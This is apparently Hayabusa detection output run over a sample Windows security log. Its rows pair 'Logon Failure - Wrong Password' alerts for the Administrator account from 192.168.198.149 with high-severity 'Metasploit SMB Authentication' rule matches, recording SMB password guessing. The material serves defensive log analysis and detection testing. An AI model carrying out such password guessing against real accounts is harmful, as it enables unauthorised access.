NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
